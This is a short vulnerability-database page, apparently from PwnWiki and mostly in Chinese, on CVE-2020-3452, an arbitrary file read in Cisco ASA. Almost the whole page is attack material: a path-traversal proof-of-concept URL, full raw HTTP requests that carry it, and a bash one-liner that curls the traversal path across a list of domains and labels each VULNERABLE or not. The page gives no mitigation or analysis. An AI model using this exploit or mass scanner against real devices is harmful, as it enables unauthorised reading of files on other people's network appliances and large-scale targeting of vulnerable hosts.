Loading
0

CVE-2020-3452 CISCO ASA任意文件读取漏洞

免费、自由、人人可编辑的漏洞库--PwnWiki.com

,

POC

/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3494.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Cookie: webvpnlogin=1; webvpnLang=en
GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: 127.0.0.1
Content-Length: 2

从列表中单行检查CVE-2020-3452

while read DOM; do curl -s -k "https://$DOM/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q Cisco && echo VULNERABLE $DOM || echo NOT VULNERABLE $DOM; done < $1

PWNWIK.COM==免费、自由、人人可编辑的漏洞库